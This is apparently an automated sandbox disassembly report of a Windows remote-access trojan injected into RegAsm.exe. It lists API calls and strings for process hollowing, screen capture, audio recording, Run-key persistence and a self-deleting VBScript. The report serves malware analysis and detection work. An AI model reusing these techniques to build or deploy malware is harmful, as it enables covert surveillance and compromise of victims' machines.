                    • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                    • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                    • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                    • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                    Function 00448404 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                    • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalEnterEnumLocalesSectionSystem
                    • String ID:
                    • API String ID: 1272433827-0
                    • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                    • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                    • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                    • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                    Function 00451F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID:
                    • API String ID: 1084509184-0
                    • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                    • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                    • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                    • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                    Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                    Download Yara Rule
                    APIs
                    • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID:
                    • API String ID: 2299586839-0
                    • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                    • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                    • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                    • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                    Function 00418E76 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                    Download Yara Rule
                    APIs
                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                    • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                      • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                    • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                    • DeleteDC.GDI32(00000000), ref: 00418F2A
                    • DeleteDC.GDI32(00000000), ref: 00418F2D
                    • DeleteObject.GDI32(00000000), ref: 00418F30
                    • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                    • DeleteDC.GDI32(00000000), ref: 00418F62
                    • DeleteDC.GDI32(00000000), ref: 00418F65
                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                    • GetIconInfo.USER32 ref: 00418FBD
                    • DeleteObject.GDI32(?), ref: 00418FEC
                    • DeleteObject.GDI32(?), ref: 00418FF9
                    • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                    • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                    • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                    • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                    • DeleteDC.GDI32(?), ref: 0041917C
                    • DeleteDC.GDI32(00000000), ref: 0041917F
                    • DeleteObject.GDI32(00000000), ref: 00419182
                    • GlobalFree.KERNEL32(?), ref: 0041918D
                    • DeleteObject.GDI32(00000000), ref: 00419241
                    • GlobalFree.KERNEL32(?), ref: 00419248
                    • DeleteDC.GDI32(?), ref: 00419258
                    • DeleteDC.GDI32(00000000), ref: 00419263
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                    • String ID: DISPLAY
                    • API String ID: 479521175-865373369
                    • Opcode ID: fd3515ee385558d8e943bffbf3e4feffdcfed35a1f0292415d45ed89f267a670
                    • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                    • Opcode Fuzzy Hash: fd3515ee385558d8e943bffbf3e4feffdcfed35a1f0292415d45ed89f267a670
                    • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                    Function 004180EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                    • GetProcAddress.KERNEL32(00000000), ref: 00418139
                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                    • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                    • GetProcAddress.KERNEL32(00000000), ref: 00418161
                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                    • GetProcAddress.KERNEL32(00000000), ref: 00418175
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                    • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                    • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                    • ResumeThread.KERNEL32(?), ref: 00418435
                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                    • GetCurrentProcess.KERNEL32(?), ref: 00418457
                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                    • GetLastError.KERNEL32 ref: 0041847A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                    • API String ID: 4188446516-3035715614
                    • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                    • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                    • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                    • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                    Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                      • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                      • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                    • ExitProcess.KERNEL32 ref: 0040D7D0
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                    • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                    • API String ID: 1861856835-332907002
                    • Opcode ID: d1e5175430559d744f3697ac5d4fa8fe9ed39947549674ebcac5be490dbfcb53
                    • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                    • Opcode Fuzzy Hash: d1e5175430559d744f3697ac5d4fa8fe9ed39947549674ebcac5be490dbfcb53
                    • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                    Function 0040D096 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                      • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63B11986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                    • ExitProcess.KERNEL32 ref: 0040D419
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                    • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                    • API String ID: 3797177996-2557013105
                    • Opcode ID: f90a1b7fb6ddb8bcfd4c781e5951c9b58c69a0543b10567a2cebf66b5454372d
                    • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                    • Opcode Fuzzy Hash: f90a1b7fb6ddb8bcfd4c781e5951c9b58c69a0543b10567a2cebf66b5454372d
                    • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                    Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                    • ExitProcess.KERNEL32(00000000), ref: 004124A0
                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                    • CloseHandle.KERNEL32(00000000), ref: 0041253B
                    • GetCurrentProcessId.KERNEL32 ref: 00412541
                    • PathFileExistsW.SHLWAPI(?), ref: 00412572
                    • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                    • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                    • lstrcatW.KERNEL32 ref: 00412601
                      • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                    • Sleep.KERNEL32(000001F4), ref: 00412682
                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                    • CloseHandle.KERNEL32(00000000), ref: 004126A9
                    • GetCurrentProcessId.KERNEL32 ref: 004126AF
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                    • String ID: .exe$8SG$WDH$exepath$open$temp_
                    • API String ID: 2649220323-436679193
                    • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                    • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                    • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                    • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                    Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                    Download Yara Rule
                    APIs
                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0041B18E
                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                    • SetEvent.KERNEL32 ref: 0041B219
                    • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                    • CloseHandle.KERNEL32 ref: 0041B23A
                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                    • API String ID: 738084811-2094122233
                    • Opcode ID: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
                    • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                    • Opcode Fuzzy Hash: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
                    • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                    Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                    • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                    • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                    • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Write$Create
                    • String ID: RIFF$WAVE$data$fmt
                    • API String ID: 1602526932-4212202414
                    • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                    • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                    • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                    • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                    Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                    • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                    • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                    • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                    • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                    • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                    • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                    • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                    • API String ID: 1646373207-255920310
                    • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                    • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                    • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                    • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                    Function 0044F42D Relevance: 30.2, APIs: 16, Strings: 1, Instructions: 419COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$EnvironmentVariable
                    • String ID: .P
                    • API String ID: 1464849758-2220739652
                    • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                    • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                    • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                    • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                    Function 0040CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                    Download Yara Rule
                    APIs
                    • _wcslen.LIBCMT ref: 0040CE07
                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                    • CopyFileW.KERNEL32 ref: 0040CED0
                    • _wcslen.LIBCMT ref: 0040CEE6
                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                    • CopyFileW.KERNEL32 ref: 0040CF84
                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                    • _wcslen.LIBCMT ref: 0040CFC6
                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                    • CloseHandle.KERNEL32 ref: 0040D02D
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                    • ExitProcess.KERNEL32 ref: 0040D062
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                    • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                    • API String ID: 1579085052-2309681474
                    • Opcode ID: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                    • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                    • Opcode Fuzzy Hash: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                    • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                    Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlenW.KERNEL32(?), ref: 0041C036
                    • _memcmp.LIBVCRUNTIME ref: 0041C04E
                    • lstrlenW.KERNEL32(?), ref: 0041C067
                    • FindFirstVolumeW.KERNEL32 ref: 0041C0A2
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                    • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                    • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                    • _wcslen.LIBCMT ref: 0041C13B
                    • FindVolumeClose.KERNEL32 ref: 0041C15B
                    • GetLastError.KERNEL32 ref: 0041C173
                    • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                    • lstrcatW.KERNEL32 ref: 0041C1B9
                    • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                    • GetLastError.KERNEL32 ref: 0041C1D0
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                    • String ID: ?
                    • API String ID: 3941738427-1684325040
                    • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
